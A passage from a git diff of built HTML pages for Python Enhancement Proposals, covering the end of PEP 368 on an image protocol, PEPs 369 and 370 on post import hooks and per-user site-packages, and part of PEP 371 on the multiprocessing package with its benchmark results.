Selects an area in the same way as the corresponding form of the +__getitem__ method and assigns to it a copy of the pixels from +the image in the second argument, that must have exactly the same +mode as this image and the same size as the specified area; the +alpha component, if present, is simply copied and doesn’t affect +the other components of the image (i.e. no alpha compositing is +performed).
+

The mode, size and buffer (including the address in memory +of the buffer) never change after an image is created.

+

It is expected that, if PEP 3118 is accepted, all the image objects +will support the new buffer protocol, however this is beyond the scope +of this PEP.

+
+
+

Image and ImageMixin Classes

+

The ImageMixin class implements all the methods and attributes +described above except mode, size, buffer and info. +Image is a subclass of ImageMixin that adds support for these +four attributes and offers the following constructor (please note that +the constructor is not part of the image protocol):

+

__init__(mode, size, color, source)

+
+
mode must be one of the constants in the MODES set, +size is a sequence of two integers (width and height of the +new image); color is a sequence of integers, one for each +component of the image, used to initialize all the pixels to the +same value; source can be a sequence of integers of the +appropriate size and format that is copied as-is in the buffer of +the new image or an existing image; in Python 2.x source can +also be an instance of str and is interpreted as a sequence of +bytes. color and source are mutually exclusive and if +they are both omitted the image is initialized to transparent +black (all the bytes in the buffer have value 16 in the YV12 +mode, 255 in the CMYK* modes and 0 for everything else). If +source is present and is an image, mode and/or size +can be omitted; if they are specified and are different from the +source mode and/or size, the source image is converted.

The exact algorithms used for resizing and doing color space +conversions may differ between Python versions and +implementations, but they always give high quality results (e.g.: +a cubic spline interpolation can be used for upsampling and an +antialias filter can be used for downsampling images); any +combination of mode conversion is supported, but the algorithm +used for conversions to and from the CMYK* modes is pretty +naïve: if you have the exact color profiles of your devices you +may want to use a good color management tool such as LittleCMS. +The new image has an empty info dict.

+
+
+
+

Line Objects

+

The line objects (returned, e.g., when iterating over an image) +support the following attributes and methods:

+

mode

+
+
The mode of the image from where this line comes.
+

__iter__() -> iterator[pixel]

+
+
Returns an iterator that iterates over all the pixels in the line, +from left to right. See below for a description of the pixel +objects.
+

__len__() -> int

+
+
Returns the number of pixels in the line (the image width).
+

__getitem__(integer) -> pixel

+
+
Returns the pixel at the specified (x) position.
+

__getitem__(slice) -> image

+
+
The selected part of the line is copied and a new image is +returned; the new image will always have height 1.
+

__setitem__(integer, integer | iterable[integer]) -> None

+
+
Modifies the pixel at the specified position; line[x] = +integer is a shortcut for line[x] = (integer,) for images +with a single component.
+

__setitem__(slice, image) -> None

+
+
Selects a part of the line and assigns to it a copy of the pixels +from the image in the second argument, that must have height 1, a +width equal to the specified slice and the same mode as this line; +the alpha component, if present, is simply copied and doesn’t +affect the other components of the image (i.e. no alpha +compositing is performed).
+
+
+

Pixel Objects

+

The pixel objects (returned, e.g., when iterating over a line) support +the following attributes and methods:

+

mode

+
+
The mode of the image from where this pixel comes.
+

value

+
+
A tuple of integers, one for each component. Any iterable of the +correct length can be assigned to value (it will be +automagically converted to a tuple), but you can’t assign to it an +integer, even if the mode has only a single component: use, e.g., +pixel.l = 123 instead.
+

r, g, b, a, l, c, m, y, k

+
+
The integer values of each component; only those applicable for +the current mode (in mode.component_names) will be available.
+
+
__iter__() -> iterator[int]
+
__len__() -> int
+
__getitem__(integer | slice) -> int | tuple[int]
+
__setitem__(integer | slice, integer | iterable[integer]) -> +None
+
+
+
These four methods emulate a fixed length list of integers, one +for each pixel component.
+
+
+

ImageSize Class

+

ImageSize is a named tuple, a class identical to tuple except +that:

+
    +
  • its constructor only accepts two integers, width and height; they +are converted in the constructor using their __index__() +methods, so all the ImageSize objects are guaranteed to contain +only int (or possibly long, in Python 2.x) instances;
  • +
  • it has a width and a height property that are equivalent to +the first and the second number in the tuple, respectively;
  • +
  • the string returned by its __repr__ method is +'imageop.ImageSize(width=%d, height=%d)' % (width, height).
  • +
+

ImageSize is not usually instantiated by end-users, but can be +used when creating a new class that implements the image protocol, +since the size attribute must be an ImageSize instance.

+
+
+
+

C API

+

The available image modes are visible at the C level as PyImage_* +constants of type PyObject * (e.g.: PyImage_RGB is +imageop.RGB).

+

The following functions offer a C-friendly interface to mode and image +objects (all the functions return NULL or -1 on failure):

+

int PyImageMode_Check(PyObject *obj)

+
+
Returns true if the object obj is a valid image mode.
+
+
int PyImageMode_GetComponents(PyObject *mode)
+
PyObject* PyImageMode_GetComponentNames(PyObject *mode)
+
int PyImageMode_GetBitsPerComponent(PyObject *mode)
+
int PyImageMode_GetBytesPerPixel(PyObject *mode)
+
int PyImageMode_GetPlanar(PyObject *mode)
+
PyObject* PyImageMode_GetSubsampling(PyObject *mode)
+
int PyImageMode_GetXDivisor(PyObject *mode)
+
int PyImageMode_GetYDivisor(PyObject *mode)
+
Py_ssize_t PyImageMode_GetLength(PyObject *mode, Py_ssize_t width, +Py_ssize_t height)
+
+
+
These functions are equivalent to their corresponding Python +attributes or methods.
+

int PyImage_Check(PyObject *obj)

+
+
Returns true if the object obj is an Image object or an +instance of a subtype of the Image type; see also +PyObject_CheckImage below.
+

int PyImage_CheckExact(PyObject *obj)

+
+
Returns true if the object obj is an Image object, but not +an instance of a subtype of the Image type.
+
+
PyObject* PyImage_New(PyObject *mode, Py_ssize_t width, +Py_ssize_t height)
+
+
+
Returns a new Image instance, initialized to transparent black +(see Image.__init__ above for the details).
+
+
PyObject* PyImage_FromImage(PyObject *image, PyObject *mode, +Py_ssize_t width, Py_ssize_t height)
+
+
+
Returns a new Image instance, initialized with the contents of +the image object rescaled and converted to the specified +mode, if necessary.
+
+
PyObject* PyImage_FromBuffer(PyObject *buffer, PyObject *mode, +Py_ssize_t width, +Py_ssize_t height)
+
+
+
Returns a new Image instance, initialized with the contents of +the buffer object.
+

int PyObject_CheckImage(PyObject *obj)

+
+
Returns true if the object obj implements a sufficient subset +of the image protocol to be accepted by the functions defined +below, even if its class is not a subclass of ImageMixin +and/or Image. Currently it simply checks for the existence +and correctness of the attributes mode, size and +buffer.
+
+
PyObject* PyImage_GetMode(PyObject *image)
+
Py_ssize_t PyImage_GetWidth(PyObject *image)
+
Py_ssize_t PyImage_GetHeight(PyObject *image)
+
int PyImage_Clip(PyObject *image)
+
PyObject* PyImage_Split(PyObject *image)
+
PyObject* PyImage_GetBuffer(PyObject *image)
+
int PyImage_AsBuffer(PyObject *image, const void **buffer, +Py_ssize_t *buffer_len)
+
+
+
These functions are equivalent to their corresponding Python +attributes or methods; the image memory can be accessed only with +the GIL and a reference to the image or its buffer held, and extra +care should be taken for modes with more than 8 bits per +component: the data is stored in native byte order and it can be +not aligned on 2 or 4 byte boundaries.
+
+
+
+

Examples

+

A few examples of common operations with the new Image class and +protocol:

+
# create a new black RGB image of 6x9 pixels
+rgb_image = imageop.Image(imageop.RGB, (6, 9))
+
+# same as above, but initialize the image to bright red
+rgb_image = imageop.Image(imageop.RGB, (6, 9), color=(255, 0, 0))
+
+# convert the image to YCbCr
+yuv_image = imageop.Image(imageop.JPEG_YV12, source=rgb_image)
+
+# read the value of a pixel and split it into three ints
+r, g, b = rgb_image[x, y]
+
+# modify the magenta component of a pixel in a CMYK image
+cmyk_image[x, y].m = 13
+
+# modify the Y (luma) component of a pixel in a *YV12 image and
+# its corresponding subsampled Cr (red chroma)
+yuv_image.y[x, y] = 42
+yuv_image.cr[x // 2, y // 2] = 54
+
+# iterate over an image
+for line in rgb_image:
+    for pixel in line:
+        # swap red and blue, and set green to 0
+        pixel.value = pixel.b, 0, pixel.r
+
+# find the maximum value of the red component in the image
+max_red = max(pixel.r for pixel in rgb_image.pixels())
+
+# count the number of colors in the image
+num_of_colors = len(set(tuple(pixel) for pixel in image.pixels()))
+
+# copy a block of 4x2 pixels near the upper right corner of an
+# image and paste it into the lower left corner of the same image
+image[:4, -2:] = image[-6:-2, 1:3]
+
+# create a copy of the image, except that the new image can have a
+# different (usually empty) info dict
+new_image = image[:]
+
+# create a mirrored copy of the image, with the left and right
+# sides flipped
+flipped_image = image[::-1, :]
+
+# downsample an image to half its original size using a fast, low
+# quality operation and a slower, high quality one:
+low_quality_image = image[::2, ::2]
+new_size = image.size.width // 2, image.size.height // 2
+high_quality_image = imageop.Image(size=new_size, source=image)
+
+# direct buffer access
+rgb_image[0, 0] = r, g, b
+assert tuple(rgb_image.buffer[:3]) == (r, g, b)
+
+
+
+
+

Backwards Compatibility

+

There are three areas touched by this PEP where backwards +compatibility should be considered:

+
    +
  • Python 2.6: new classes and objects are added to the imageop +module without touching the existing module contents; new methods +and attributes will be added to Tkinter.PhotoImage and its +__getitem__ and __setitem__ methods will be modified to +accept integers, tuples and slices (currently they only accept +strings). All the changes provide a superset of the existing +functionality, so no major compatibility issues are expected.
  • +
  • Python 3.0: the legacy contents of the imageop module will +be deleted, according to PEP 3108; everything defined in this +proposal will work like in Python 2.x with the exception of the +usual 2.x/3.0 differences (e.g. support for long integers and +for interpreting str instances as sequences of bytes will be +dropped).
  • +
  • external libraries: the names and the semantics of the standard +image methods and attributes are carefully chosen to allow some +external libraries that manipulate images (including at least PIL, +wxPython and pygame) to implement the new protocol in their image +classes without breaking compatibility with existing code. The only +blatant conflicts between the image protocol and NumPy arrays are +the value of the size attribute and the coordinates order in the +image[x, y] expression.
  • +
+
+
+

Reference Implementation

+

If this PEP is accepted, the author will provide a reference +implementation of the new classes in pure Python (that can run in +CPython, PyPy, Jython and IronPython) and a second one optimized for +speed in Python and C, suitable for inclusion in the CPython standard +library. The author will also submit the required Tkinter patches. +For all the code will be available a version for Python 2.x and a +version for Python 3.0 (it is expected that the two version will be +very similar and the Python 3.0 one will probably be generated almost +completely automatically).

+
+
+

Acknowledgments

+

The implementation of this PEP, if accepted, is sponsored by Google +through the Google Summer of Code program.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0368.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0369/index.html b/pep-0369/index.html new file mode 100644 index 00000000000..e9a6ea37be7 --- /dev/null +++ b/pep-0369/index.html @@ -0,0 +1,401 @@ + + + + + + + + PEP 369 – Post import hooks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 369 – Post import hooks

+
+
Author:
+
Christian Heimes <christian at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
02-Jan-2008
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
02-Dec-2012
+
+
+
+
Table of Contents +
+
+

Withdrawal Notice

+

This PEP has been withdrawn by its author, as much of the detailed design +is no longer valid following the migration to importlib in Python 3.3.

+
+
+

Abstract

+

This PEP proposes enhancements for the import machinery to add +post import hooks. It is intended primarily to support the wider +use of abstract base classes that is expected in Python 3.0.

+

The PEP originally started as a combined PEP for lazy imports and +post import hooks. After some discussion on the python-dev mailing +list the PEP was parted in two separate PEPs. [1]

+
+
+

Rationale

+

Python has no API to hook into the import machinery and execute code +after a module is successfully loaded. The import hooks of PEP 302 are +about finding modules and loading modules but they were not designed to +as post import hooks.

+
+
+

Use cases

+

A use case for a post import hook is mentioned in Alyssa (Nick) Coghlan’s initial +posting [2]. about callbacks on module import. It was found during the +development of Python 3.0 and its ABCs. We wanted to register classes +like decimal.Decimal with an ABC but the module should not be imported +on every interpreter startup. Alyssa came up with this example:

+
@imp.when_imported('decimal')
+def register(decimal):
+    Inexact.register(decimal.Decimal)
+
+
+

The function register is registered as callback for the module named +‘decimal’. When decimal is imported the function is called with the +module object as argument.

+

While this particular example isn’t necessary in practice, (as +decimal.Decimal will inherit from the appropriate abstract Number base +class in 2.6 and 3.0), it still illustrates the principle.

+
+
+

Existing implementations

+

PJE’s peak.util.imports [3] implements post load hooks. My +implementation shares a lot with his and it’s partly based on his ideas.

+
+
+

Post import hook implementation

+

Post import hooks are called after a module has been loaded. The hooks +are callable which take one argument, the module instance. They are +registered by the dotted name of the module, e.g. ‘os’ or ‘os.path’.

+

The callable are stored in the dict sys.post_import_hooks which +is a mapping from names (as string) to a list of callables or None.

+
+

States

+
+

No hook was registered

+

sys.post_import_hooks contains no entry for the module

+
+
+

A hook is registered and the module is not loaded yet

+

The import hook registry contains an entry +sys.post_import_hooks[“name”] = [hook1]

+
+
+

A module is successfully loaded

+

The import machinery checks if sys.post_import_hooks contains post import +hooks for the newly loaded module. If hooks are found then the hooks are +called in the order they were registered with the module instance as first +argument. The processing of the hooks is stopped when a method raises an +exception. At the end the entry for the module name set to None, even +when an error has occurred.

+

Additionally the new __notified__ slot of the module object is set +to True in order to prevent infinity recursions when the notification +method is called inside a hook. For object which don’t subclass from +PyModule a new attribute is added instead.

+
+
+

A module can’t be loaded

+

The import hooks are neither called nor removed from the registry. It +may be possible to load the module later.

+
+
+

A hook is registered but the module is already loaded

+

The hook is fired immediately.

+
+
+
+

Invariants

+

The import hook system guarantees certain invariants. XXX

+
+
+

Sample Python implementation

+

A Python implementation may look like:

+
  def notify(name):
+      try:
+          module = sys.modules[name]
+      except KeyError:
+          raise ImportError("Module %s has not been imported" % (name,))
+      if module.__notified__:
+          return
+      try:
+          module.__notified__ = True
+          if '.' in name:
+              notify(name[:name.rfind('.')])
+          for callback in post_import_hooks[name]:
+             callback(module)
+      finally:
+          post_import_hooks[name] = None
+
+XXX
+
+
+
+
+

C API

+
+

New C API functions

+
+
PyObject* PyImport_GetPostImportHooks(void)
Returns the dict sys.post_import_hooks or NULL
+
PyObject* PyImport_NotifyLoadedByModule(PyObject *module)
Notify the post import system that a module was requested. Returns the +a borrowed reference to the same module object or NULL if an error has +occurred. The function calls only the hooks for the module itself and not +its parents. The function must be called with the import lock acquired.
+
PyObject* PyImport_NotifyLoadedByName(const char *name)
PyImport_NotifyLoadedByName("a.b.c") calls +PyImport_NotifyLoadedByModule() for a, a.b and a.b.c +in that particular order. The modules are retrieved from +sys.modules. If a module can’t be retrieved, an exception is raised +otherwise the a borrowed reference to modname is returned. +The hook calls always start with the prime parent module. +The caller of PyImport_NotifyLoadedByName() must hold the import lock!
+
PyObject* PyImport_RegisterPostImportHook(PyObject *callable, PyObject *mod_name)
Register a new hook callable for the module mod_name
+
int PyModule_GetNotified(PyObject *module)
Returns the status of the __notified__ slot / attribute.
+
int PyModule_SetNotified(PyObject *module, int status)
Set the status of the __notified__ slot / attribute.
+
+

The PyImport_NotifyLoadedByModule() method is called inside +import_submodule(). The import system makes sure that the import lock +is acquired and the hooks for the parent modules are already called.

+
+
+
+

Python API

+

The import hook registry and two new API methods are exposed through the +sys and imp module.

+
+
sys.post_import_hooks
The dict contains the post import hooks:
{"name" : [hook1, hook2], ...}
+
+
+
+
imp.register_post_import_hook(hook: "callable", name: str)
Register a new hook hook for the module name
+
imp.notify_module_loaded(module: "module instance") -> module
Notify the system that a module has been loaded. The method is provided +for compatibility with existing lazy / deferred import extensions.
+
module.__notified__
A slot of a module instance. XXX
+
+

The when_imported function decorator is also in the imp module, +which is equivalent to:

+
def when_imported(name):
+    def register(hook):
+        register_post_import_hook(hook, name)
+    return register
+
+
+
+
imp.when_imported(name) -> decorator function
for @when_imported(name) def hook(module): pass
+
+
+
+
+

Open issues

+

The when_imported decorator hasn’t been written.

+

The code contains several XXX comments. They are mostly about error +handling in edge cases.

+
+
+

Backwards Compatibility

+

The new features and API don’t conflict with old import system of Python +and don’t cause any backward compatibility issues for most software. +However systems like PEAK and Zope which implement their own lazy import +magic need to follow some rules.

+

The post import hooks carefully designed to cooperate with existing +deferred and lazy import systems. It’s the suggestion of the PEP author +to replace own on-load-hooks with the new hook API. The alternative +lazy or deferred imports will still work but the implementations must +call the imp.notify_module_loaded function.

+
+
+

Reference Implementation

+

A reference implementation is already written and is available in the +py3k-importhook branch. [4] It still requires some cleanups, +documentation updates and additional unit tests.

+
+
+

Acknowledgments

+

Alyssa Coghlan, for proof reading and the initial discussion +Phillip J. Eby, for his implementation in PEAK and help with my own implementation

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0369.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0370/index.html b/pep-0370/index.html new file mode 100644 index 00000000000..34ae7bd133e --- /dev/null +++ b/pep-0370/index.html @@ -0,0 +1,353 @@ + + + + + + + + PEP 370 – Per user site-packages directory | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 370 – Per user site-packages directory

+
+
Author:
+
Christian Heimes <christian at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Jan-2008
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new a per user site-packages directory to allow +users the local installation of Python packages in their home directory.

+
+
+

Rationale

+

Current Python versions don’t have a unified way to install packages +into the home directory of a user (except for Mac Framework +builds). Users are either forced to ask the system administrator to +install or update a package for them or to use one of the many +workarounds like Virtual Python [1], Working Env [2] or +Virtual Env [3].

+

It’s not the goal of the PEP to replace the tools or to implement +isolated installations of Python. It only implements the most common +use case of an additional site-packages directory for each user.

+

The feature can’t be implemented using the environment variable +PYTHONPATH. The env var just inserts a new directory to the beginning +of sys.path but it doesn’t parse the pth files in the directory. A +full blown site-packages path is required for several applications +and Python eggs.

+
+
+

Specification

+

site directory (site-packages)

+
+
A directory in sys.path. In contrast to ordinary directories the pth +files in the directory are processed, too.
+

user site directory

+
+
A site directory inside the users’ home directory. A user site +directory is specific to a Python version. The path contains +the version number (major and minor only).
+
Unix (including Mac OS X)
~/.local/lib/python2.6/site-packages
+
Windows
%APPDATA%/Python/Python26/site-packages
+
+
+

user data directory

+
+
Usually the parent directory of the user site directory. It’s meant +for Python version specific data like config files, docs, images +and translations.
+
Unix (including Mac)
~/.local/lib/python2.6
+
Windows
%APPDATA%/Python/Python26
+
+
+

user base directory

+
+
It’s located inside the user’s home directory. The user site and +use config directory are inside the base directory. On some systems +the directory may be shared with 3rd party apps.
+
Unix (including Mac)
~/.local
+
Windows
%APPDATA%/Python
+
+
+

user script directory

+
+
A directory for binaries and scripts. [10] It’s shared across Python +versions and the destination directory for scripts.
+
Unix (including Mac)
~/.local/bin
+
Windows
%APPDATA%/Python/Scripts
+
+
+
+

Windows Notes

+

On Windows the Application Data directory (aka APPDATA) was chosen +because it is the most designated place for application data. Microsoft +recommends that software doesn’t write to USERPROFILE [5] and +My Documents is not suited for application data, either. [8] The code +doesn’t query the Win32 API, instead it uses the environment variable +%APPDATA%.

+

The application data directory is part of the roaming profile. In networks +with domain logins the application data may be copied from and to the a +central server. This can slow down log-in and log-off. Users can keep +the data on the server by e.g. setting PYTHONUSERBASE to the value +“%HOMEDRIVE%%HOMEPATH%Applicata Data”. Users should consult their local +administrator for more information. [13]

+
+
+

Unix Notes

+

On Unix ~/.local was chosen in favor over ~/.python because the +directory is already used by several other programs in analogy to +/usr/local. [7] [11]

+
+
+

Mac OS X Notes

+

On Mac OS X Python uses ~/.local directory as well. [12] Framework builds +of Python include ~/Library/Python/2.6/site-packages as an additional +search path.

+
+
+
+

Implementation

+

The site module gets a new method adduserpackage() which adds the +appropriate directory to the search path. The directory is not added if +it doesn’t exist when Python is started. However the location of the +user site directory and user base directory is stored in an internal +variable for distutils.

+

The user site directory is added before the system site directories +but after Python’s search paths and PYTHONPATH. This setup allows +the user to install a different version of a package than the system +administrator but it prevents the user from accidentally overwriting a +stdlib module. Stdlib modules can still be overwritten with +PYTHONPATH.

+

For security reasons the user site directory is not added to +sys.path when the effective user id or group id is not equal to the +process uid / gid [9]. It’s an additional barrier against code injection +into suid apps. However Python suid scripts must always use the -E +and -s option or users can sneak in their own code.

+

The user site directory can be suppressed with a new option -s or +the environment variable PYTHONNOUSERSITE. The feature can be +disabled globally by setting site.ENABLE_USER_SITE to the value +False. It must be set by editing site.py. It can’t be altered +in sitecustomize.py or later.

+

The path to the user base directory can be overwritten with the +environment variable PYTHONUSERBASE. The default location is used +when PYTHONUSERBASE is not set or empty.

+

distutils.command.install (setup.py install) gets a new argument +--user to install packages in the user site directory. The required +directories are created on demand.

+

distutils.command.build_ext (setup.py build_ext) gets a new argument +--user which adds the include/ and lib/ directories in the user base +directory to the search paths for header files and libraries. It also +adds the lib/ directory to rpath.

+

The site module gets two arguments --user-base and --user-site +to print the path to the user base or user site directory to the standard +output. The feature is intended for scripting, e.g. +./configure --prefix $(python2.5 -m site --user-base)

+

distutils.sysconfig will get methods to access the private variables +of site. (not yet implemented)

+

The Windows updater needs to be updated, too. It should create a menu +item which opens the user site directory in a new explorer windows.

+
+
+

Backwards Compatibility

+

TBD

+
+
+

Reference Implementation

+

A reference implementation is available in the bug tracker. [4]

+
+ +
+

References

+ +

[6] Initial suggestion for a per user site-packages directory + https://mail.python.org/archives/list/python-dev@python.org/message/V23CUKRH3VCHFLV33ADMHJSM53STPA7I/

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0370.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0371/index.html b/pep-0371/index.html new file mode 100644 index 00000000000..1747c723055 --- /dev/null +++ b/pep-0371/index.html @@ -0,0 +1,535 @@ + + + + + + + + PEP 371 – Addition of the multiprocessing package to the standard library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 371 – Addition of the multiprocessing package to the standard library

+
+
Author:
+
Jesse Noller <jnoller at gmail.com>, +Richard Oudkerk <r.m.oudkerk at googlemail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
06-May-2008
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
03-Jun-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the inclusion of the pyProcessing [1] package +into the Python standard library, renamed to “multiprocessing”.

+

The processing package mimics the standard library threading +module functionality to provide a process-based approach to +threaded programming allowing end-users to dispatch multiple +tasks that effectively side-step the global interpreter lock.

+

The package also provides server and client functionality +(processing.Manager) to provide remote sharing and management of +objects and tasks so that applications may not only leverage +multiple cores on the local machine, but also distribute objects +and tasks across a cluster of networked machines.

+

While the distributed capabilities of the package are beneficial, +the primary focus of this PEP is the core threading-like API and +capabilities of the package.

+
+
+

Rationale

+

The current CPython interpreter implements the Global Interpreter +Lock (GIL) and barring work in Python 3000 or other versions +currently planned [2], the GIL will remain as-is within the +CPython interpreter for the foreseeable future. While the GIL +itself enables clean and easy to maintain C code for the +interpreter and extensions base, it is frequently an issue for +those Python programmers who are leveraging multi-core machines.

+

The GIL itself prevents more than a single thread from running +within the interpreter at any given point in time, effectively +removing Python’s ability to take advantage of multi-processor +systems.

+

The pyprocessing package offers a method to side-step the GIL +allowing applications within CPython to take advantage of +multi-core architectures without asking users to completely change +their programming paradigm (i.e.: dropping threaded programming +for another “concurrent” approach - Twisted, Actors, etc).

+

The Processing package offers CPython a “known API” which mirrors +albeit in a PEP 8 compliant manner, that of the threading API, +with known semantics and easy scalability.

+

In the future, the package might not be as relevant should the +CPython interpreter enable “true” threading, however for some +applications, forking an OS process may sometimes be more +desirable than using lightweight threads, especially on those +platforms where process creation is fast and optimized.

+

For example, a simple threaded application:

+
from threading import Thread as worker
+
+def afunc(number):
+    print number * 3
+
+t = worker(target=afunc, args=(4,))
+t.start()
+t.join()
+
+
+

The pyprocessing package mirrored the API so well, that with a +simple change of the import to:

+
from processing import process as worker
+
+
+

The code would now execute through the processing.process class. +Obviously, with the renaming of the API to PEP 8 compliance there +would be additional renaming which would need to occur within +user applications, however minor.

+

This type of compatibility means that, with a minor (in most cases) +change in code, users’ applications will be able to leverage all +cores and processors on a given machine for parallel execution. +In many cases the pyprocessing package is even faster than the +normal threading approach for I/O bound programs. This of course, +takes into account that the pyprocessing package is in optimized C +code, while the threading module is not.

+
+
+

The “Distributed” Problem

+

In the discussion on Python-Dev about the inclusion of this +package [3] there was confusion about the intentions this PEP with +an attempt to solve the “Distributed” problem - frequently +comparing the functionality of this package with other solutions +like MPI-based communication [4], CORBA, or other distributed +object approaches [5].

+

The “distributed” problem is large and varied. Each programmer +working within this domain has either very strong opinions about +their favorite module/method or a highly customized problem for +which no existing solution works.

+

The acceptance of this package does not preclude or recommend that +programmers working on the “distributed” problem not examine other +solutions for their problem domain. The intent of including this +package is to provide entry-level capabilities for local +concurrency and the basic support to spread that concurrency +across a network of machines - although the two are not tightly +coupled, the pyprocessing package could in fact, be used in +conjunction with any of the other solutions including MPI/etc.

+

If necessary - it is possible to completely decouple the local +concurrency abilities of the package from the +network-capable/shared aspects of the package. Without serious +concerns or cause however, the author of this PEP does not +recommend that approach.

+
+
+

Performance Comparison

+

As we all know - there are “lies, damned lies, and benchmarks”. +These speed comparisons, while aimed at showcasing the performance +of the pyprocessing package, are by no means comprehensive or +applicable to all possible use cases or environments. Especially +for those platforms with sluggish process forking timing.

+

All benchmarks were run using the following:

+
    +
  • 4 Core Intel Xeon CPU @ 3.00GHz
  • +
  • 16 GB of RAM
  • +
  • Python 2.5.2 compiled on Gentoo Linux (kernel 2.6.18.6)
  • +
  • pyProcessing 0.52
  • +
+

All of the code for this can be downloaded from +http://jessenoller.com/code/bench-src.tgz

+

The basic method of execution for these benchmarks is in the +run_benchmarks.py [6] script, which is simply a wrapper to execute a +target function through a single threaded (linear), multi-threaded +(via threading), and multi-process (via pyprocessing) function for +a static number of iterations with increasing numbers of execution +loops and/or threads.

+

The run_benchmarks.py script executes each function 100 times, +picking the best run of that 100 iterations via the timeit module.

+

First, to identify the overhead of the spawning of the workers, we +execute a function which is simply a pass statement (empty):

+
cmd: python run_benchmarks.py empty_func.py
+Importing empty_func
+Starting tests ...
+non_threaded (1 iters)  0.000001 seconds
+threaded (1 threads)    0.000796 seconds
+processes (1 procs)     0.000714 seconds
+
+non_threaded (2 iters)  0.000002 seconds
+threaded (2 threads)    0.001963 seconds
+processes (2 procs)     0.001466 seconds
+
+non_threaded (4 iters)  0.000002 seconds
+threaded (4 threads)    0.003986 seconds
+processes (4 procs)     0.002701 seconds
+
+non_threaded (8 iters)  0.000003 seconds
+threaded (8 threads)    0.007990 seconds
+processes (8 procs)     0.005512 seconds
+
+
+

As you can see, process forking via the pyprocessing package is +faster than the speed of building and then executing the threaded +version of the code.

+

The second test calculates 50000 Fibonacci numbers inside of each +thread (isolated and shared nothing):

+
cmd: python run_benchmarks.py fibonacci.py
+Importing fibonacci
+Starting tests ...
+non_threaded (1 iters)  0.195548 seconds
+threaded (1 threads)    0.197909 seconds
+processes (1 procs)     0.201175 seconds
+
+non_threaded (2 iters)  0.397540 seconds
+threaded (2 threads)    0.397637 seconds
+processes (2 procs)     0.204265 seconds
+
+non_threaded (4 iters)  0.795333 seconds
+threaded (4 threads)    0.797262 seconds
+processes (4 procs)     0.206990 seconds
+
+non_threaded (8 iters)  1.591680 seconds
+threaded (8 threads)    1.596824 seconds
+processes (8 procs)     0.417899 seconds
+
+
+

The third test calculates the sum of all primes below 100000, +again sharing nothing:

+
cmd: run_benchmarks.py crunch_primes.py
+Importing crunch_primes
+Starting tests ...
+non_threaded (1 iters)  0.495157 seconds
+threaded (1 threads)    0.522320 seconds
+processes (1 procs)     0.523757 seconds
+
+non_threaded (2 iters)  1.052048 seconds
+threaded (2 threads)    1.154726 seconds
+processes (2 procs)     0.524603 seconds
+
+non_threaded (4 iters)  2.104733 seconds
+threaded (4 threads)    2.455215 seconds
+processes (4 procs)     0.530688 seconds
+
+non_threaded (8 iters)  4.217455 seconds
+threaded (8 threads)    5.109192 seconds
+processes (8 procs)     1.077939 seconds
+
+
+

The reason why tests two and three focused on pure numeric +crunching is to showcase how the current threading implementation +does hinder non-I/O applications. Obviously, these tests could be +improved to use a queue for coordination of results and chunks of +work but that is not required to show the performance of the +package and core processing.process module.

+

The next test is an I/O bound test. This is normally where we see +a steep improvement in the threading module approach versus a +single-threaded approach. In this case, each worker is opening a +descriptor to lorem.txt, randomly seeking within it and writing +lines to /dev/null:

+
cmd: python run_benchmarks.py file_io.py
+Importing file_io
+Starting tests ...
+non_threaded (1 iters)  0.057750 seconds
+threaded (1 threads)    0.089992 seconds
+processes (1 procs)     0.090817 seconds
+
+non_threaded (2 iters)  0.180256 seconds
+threaded (2 threads)    0.329961 seconds
+processes (2 procs)     0.096683 seconds
+
+non_threaded (4 iters)  0.370841 seconds
+threaded (4 threads)    1.103678 seconds
+processes (4 procs)     0.101535 seconds
+
+non_threaded (8 iters)  0.749571 seconds
+threaded (8 threads)    2.437204 seconds
+processes (8 procs)     0.203438 seconds
+
+
+

As you can see, pyprocessing is still faster on this I/O operation +than using multiple threads. And using multiple threads is slower +than the single threaded execution itself.

+

Finally, we will run a socket-based test to show network I/O +performance. This function grabs a URL from a server on the LAN +that is a simple error page from tomcat. It gets the page 100 +times. The network is silent, and a 10G connection:

+
cmd: python run_benchmarks.py url_get.py
+Importing url_get
+Starting tests ...
+non_threaded (1 iters)  0.124774 seconds
+threaded (1 threads)    0.120478 seconds
+processes (1 procs)     0.121404 seconds
+
+non_threaded (2 iters)  0.239574 seconds
+threaded (2 threads)    0.146138 seconds
+processes (2 procs)     0.138366 seconds
+
+non_threaded (4 iters)  0.479159 seconds
+threaded (4 threads)    0.200985 seconds
+processes (4 procs)     0.188847 seconds
+
+non_threaded (8 iters)  0.960621 seconds
+threaded (8 threads)    0.659298 seconds
+processes (8 procs)     0.298625 seconds
+
+
+

We finally see threaded performance surpass that of +single-threaded execution, but the pyprocessing package is still +faster when increasing the number of workers. If you stay with +one or two threads/workers, then the timing between threads and +pyprocessing is fairly close.

+

